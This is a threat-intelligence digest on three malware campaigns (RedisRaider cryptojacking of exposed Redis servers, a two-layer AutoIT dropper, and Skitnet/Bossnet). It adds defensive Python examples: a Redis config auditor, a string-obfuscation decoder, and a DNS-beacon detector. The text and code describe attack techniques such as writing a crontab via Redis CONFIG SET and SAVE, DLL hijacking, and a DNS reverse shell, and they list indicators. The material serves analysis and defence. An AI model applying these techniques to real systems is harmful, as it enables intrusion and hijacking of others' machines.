Datadog's investigation uncovered that the same infrastructure used for the server-level attacks also hosted a web-based Monero miner, indicating a multi-pronged revenue generation strategy. The attackers generate income not only from hijacked Linux servers but also from unsuspecting website visitors. Experts emphasize the need for proper configuration and security measures for publicly accessible Redis servers, including strong authentication and access controls, to prevent RedisRaider and similar cryptojacking campaigns from compromising systems and stealing resources.
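
A redis.conf audit for the settings that make this attack possible, added as an example (it is not Datadog's code or anything from the campaign). It looks only at bind, protected-mode, requirepass, and whether CONFIG has been renamed away; Redis 6+ ACL rules such as `-@dangerous` on the default user are the more complete control and are not parsed here. Both configuration texts are constructed.

```python
import shlex


def parse_redis_conf(text: str) -> list:
    """Turn redis.conf text into (directive, [args]) pairs; shlex handles quoted values such as ""."""
    out = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        out.append((parts[0].lower(), parts[1:]))
    return out


def audit_redis_conf(text: str) -> list:
    """Return a list of findings; an empty list means none of the audited weaknesses is present."""
    conf = parse_redis_conf(text)

    def last(directive):
        # Redis honours the last occurrence of a directive.
        vals = [args for name, args in conf if name == directive]
        return vals[-1] if vals else None

    findings = []

    pm = last("protected-mode")
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode no: remote clients are accepted without authentication")

    bind = last("bind")
    if bind is None:
        findings.append("no bind directive: Redis listens on every interface")
    elif any(a.lstrip("-") in ("0.0.0.0", "::", "::*", "*") for a in bind):
        findings.append("bind exposes Redis on all interfaces: " + " ".join(bind))

    pw = last("requirepass")
    if not pw or not pw[0]:
        findings.append("no requirepass: anyone who can reach the port can issue commands")

    renamed = [args for name, args in conf
               if name == "rename-command" and args and args[0].upper() == "CONFIG"]
    if not renamed:
        findings.append("CONFIG not renamed/disabled: CONFIG SET dir/dbfilename plus SAVE can write a crontab")

    return findings


# Constructed example of a typical exposed instance (not from the report).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
daemonize yes
"""

# Constructed hardened counterpart: loopback only, auth required, CONFIG removed from the wire.
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG ""
daemonize yes
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf) or ["ok"])
```

The CONFIG finding is the one that maps directly to the cron-job technique: without CONFIG, an attacker who reaches an open instance can still read and write keys, but cannot redirect the dump file into a cron directory.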

Recommended read:
References :
  • cyberpress.org: A newly discovered cryptojacking campaign, dubbed RedisRaider, is targeting publicly accessible Redis servers on Linux systems with an aggressive and technically complex attack chain.
  • thehackernews.com: Cybersecurity researchers are calling attention to a new Linux cryptojacking campaign that's targeting publicly accessible Redis servers.
  • eSecurity Planet: New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency
  • Cyber Security News: New RedisRaider Campaign Attacking Linux Servers by Abusing Redis Configuration
  • gbhackers.com: Datadog Security Research has uncovered a formidable new cryptojacking campaign dubbed “RedisRaider,” specifically targeting Linux servers with publicly accessible Redis instances.
  • www.esecurityplanet.com: New Go-Based Malware ‘RedisRaider’ Exploits Redis Servers to Mine Cryptocurrency

@gbhackers.com //
Cybersecurity researchers have recently uncovered a sophisticated malware campaign targeting Windows systems through the exploitation of AutoIT scripts. AutoIT, a scripting language initially designed for Windows automation, has become a popular tool in the malware ecosystem due to its simplicity and ability to interact with various Windows components. This particular campaign stands out for its use of a double layer of AutoIT code and intricate obfuscation techniques, allowing it to evade detection and maintain persistence on infected machines.

The attack begins with a compiled AutoIT executable file named "1. Project & Profit.exe" (SHA256: b5fbae9376db12a3fcbc99e83ccad97c87fb9e23370152d1452768a3676f5aeb). Upon execution, this file downloads an AutoIT interpreter, saving it as "C:\Users\Public\Guard.exe," along with another AutoIT script, stored as "Secure.au3," and a PowerShell script named "PublicProfile.ps1." The "PublicProfile.ps1" script is immediately generated and executed, facilitating further stages of the infection. Persistence is achieved by creating a .url shortcut in the Windows Startup directory, ensuring that a JavaScript file is triggered upon each user login. This JavaScript file then re-executes the AutoIT interpreter with a second-stage script, keeping the malicious processes active.

The second layer of AutoIT code, referred to as script "G," employs heavy obfuscation to hinder analysis. Every string in this script is stored as a list of decimal ASCII codes separated by "]" characters and passed through a custom function called "Wales," which turns the list back into text at run time, so nothing meaningful appears in the script until it is decoded. An example of this obfuscation is the encoded sequence "80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41," which decodes to "ProcessExists('avastui.exe')." This shows the malware checking for a running antivirus process, presumably to avoid detection or alter its behavior. The attack culminates in the execution of a malicious DLL named "Urshqbgpm.dll" by injecting it into a "jsc.exe" process.
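
A decoder for the "Wales" string encoding described above, added as an example; it is not the malware's code. The only literal taken from the article is the quoted sequence; the surrounding AutoIT fragment, its variable names, and the Execute() wrapper are constructed, and the other two encoded literals in it are generated with the matching encoder so they round-trip exactly.

```python
import re

# A run of two or more "number]" groups followed by a final number, e.g. 80]114]111]...]41
ENCODED_RUN_RE = re.compile(r"(?<!\d)(?:\d{1,3}\]){2,}\d{1,3}(?!\d)")
BINARY_NAME_RE = re.compile(r"[\w.-]+\.(?:exe|dll)\b", re.I)


def wales_decode(encoded: str) -> str:
    """Reverse the encoding: each ']'-separated decimal is one character code."""
    return "".join(chr(int(n)) for n in encoded.split("]") if n)


def wales_encode(text: str) -> str:
    """Produce the same representation the script uses, for round-trip checks and test fixtures."""
    return "]".join(str(ord(c)) for c in text)


def extract_strings(script: str) -> list:
    """Find every encoded run in an AutoIT script and return (encoded, decoded) pairs in order."""
    return [(m.group(0), wales_decode(m.group(0))) for m in ENCODED_RUN_RE.finditer(script)]


def referenced_binaries(script: str) -> list:
    """Executable and DLL names hidden inside the decoded strings, in the order found."""
    names = []
    for _, decoded in extract_strings(script):
        names.extend(BINARY_NAME_RE.findall(decoded))
    return names


# The encoded sequence quoted in the article.
PAGE_SAMPLE = ("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]"
               "116]117]105]46]101]120]101]39]41")

# Constructed second-stage fragment (variable names and control flow are mine, not the real script).
SAMPLE_SCRIPT = (
    'If Execute(Wales("' + PAGE_SAMPLE + '")) Then\n'
    '    $sDll = Wales("' + wales_encode("Urshqbgpm.dll") + '")\n'
    '    $sHost = Wales("' + wales_encode("jsc.exe") + '")\n'
    'EndIf\n'
)

if __name__ == "__main__":
    for enc, dec in extract_strings(SAMPLE_SCRIPT):
        print(enc[:24] + "...", "->", dec)
```

Running the extractor over the real script "G" turns the obfuscated blob into a plain list of strings, which is usually enough to see the process checks, file names and URLs without stepping through the interpreter.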

Recommended read:
References :
  • cyberpress.org: Hackers Use AutoIT Scripts to Spread Malware on Windows Systems
  • isc.sans.edu: RAT Dropped By Two Layers of AutoIT Code, (Mon, May 19th)
  • gbhackers.com: Hackers Exploit AutoIT Scripts to Deploy Malware Targeting Windows Systems

Mandvi@Cyber Security News //
Skitnet, also known as Bossnet, is a multi-stage malware that has emerged as a favored tool for ransomware gangs, offering stealth and versatility in cybercrime. First advertised on underground forums like RAMP in April 2024, it has quickly gained traction among notorious groups such as BlackBasta. These groups have leveraged Skitnet's capabilities in phishing attacks targeting enterprise platforms like Microsoft Teams. The malware is attributed to threat actor LARVA-306.

Skitnet employs advanced techniques for stealthy payload delivery and persistent system compromise. Its initial executable, written in Rust, decrypts an embedded payload compiled in Nim. The Nim binary establishes a reverse shell to the command-and-control (C2) server over DNS, and it resolves the Windows API functions it needs at run time rather than listing them in the import table, which hides them from static analysis. The session is initiated with randomized DNS queries, giving the operators a communication channel that blends into ordinary name resolution.

To maintain persistence, Skitnet utilizes sophisticated mechanisms such as DLL hijacking. It leverages a legitimate, signed executable from Asus (ISP.exe) placed alongside a malicious library (SnxHidLib.DLL). This malicious DLL triggers the execution of a PowerShell script (pas.ps1), which operates in an infinite loop to relay the device’s C drive serial number to the C2 server, continuously awaiting commands. Skitnet also features commands for data exfiltration and can even download a .NET loader binary for serving additional payloads, showcasing its versatility as a post-exploitation tool.
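
A resolver-log heuristic for the randomized DNS traffic described above, added here as an example and not derived from Skitnet's code or any vendor detection. It flags a client that resolves many unique, high-entropy subdomains under one apex domain, which is the footprint a DNS-carried reverse shell leaves in resolver logs; the apex is approximated by label count (no public-suffix list), the thresholds are my choices, and the log lines are constructed.

```python
import math
from collections import Counter, defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character; 16 distinct characters give exactly 4.0, 'www' gives 0.0."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def split_name(qname: str, apex_labels: int = 2):
    """Return (subdomain, apex) for a query name. Apex depth by label count is a simplification."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= apex_labels:
        return "", ".".join(labels)
    return ".".join(labels[:-apex_labels]), ".".join(labels[-apex_labels:])


def find_dns_beacons(log_lines, min_unique: int = 8, min_entropy: float = 3.0) -> list:
    """Flag (client, apex) pairs that resolve many unique, random-looking subdomains."""
    seen = defaultdict(set)
    for line in log_lines:
        if not line.strip() or line.startswith("#"):
            continue
        _ts, client, qname, _qtype = line.split()
        sub, apex = split_name(qname)
        if sub:
            seen[(client, apex)].add(sub)

    alerts = []
    for (client, apex), subs in seen.items():
        entropies = [shannon_entropy(s.replace(".", "")) for s in subs]
        random_looking = sum(1 for e in entropies if e >= min_entropy)
        if random_looking >= min_unique:
            alerts.append({
                "client": client,
                "apex": apex,
                "unique_subdomains": len(subs),
                "random_looking": random_looking,
                "mean_entropy": round(sum(entropies) / len(entropies), 2),
            })
    return alerts


# Constructed resolver log, one query per line: "<epoch> <client> <qname> <qtype>" (not real traffic).
RANDOM_LABELS = [
    "q7w3e9r1t5y8u2i4", "o6p0a1s2d3f4g5h9", "j8k5l2z7x0c3v6b1", "n4m9q2w7e0r5t1y3", "u8i6o3p1a9s4d2f7",
    "g5h0j3k8l1z6x9c2", "v7b4n1m8q0w3e6r2", "t9y5u0i2o7p4a1s8", "d3f6g1h9j4k0l7z2", "x5c8v2b0n6m3q9w1",
]
SAMPLE_LOG = (
    [f"171800000{i} 10.0.0.5 {lbl}.c2-example.invalid A" for i, lbl in enumerate(RANDOM_LABELS)]
    + [
        "1718000020 10.0.0.7 www.example.com A",
        "1718000021 10.0.0.7 mail.example.com A",
        "1718000022 10.0.0.7 cdn.example.com A",
        "1718000023 10.0.0.7 www.example.com AAAA",
    ]
)

if __name__ == "__main__":
    for alert in find_dns_beacons(SAMPLE_LOG):
        print(alert)
```

Ordinary clients also produce unique-looking labels (CDN hashes, anti-virus cloud lookups), so in production the apex domains in alerts should be checked against an allowlist of known services before escalating; the combination of a single host, a single unfamiliar apex, and a steady stream of high-entropy labels is what distinguishes a tunnel or reverse shell from that background.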

Recommended read:
References :
  • bsky.app: Ransomware gangs increasingly use Skitnet post-exploitation malware ift.tt/cCJbfqk
  • Cyber Security News: Skitnet Malware Uses Advanced Stealth Methods to Deliver Payload and Ensure Persistence Techniques
  • The DefendOps Diaries: Explore Skitnet, a powerful ransomware tool reshaping cybercrime with its stealth and versatility, used by notorious gangs like BlackBasta.
  • The Hacker News: Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access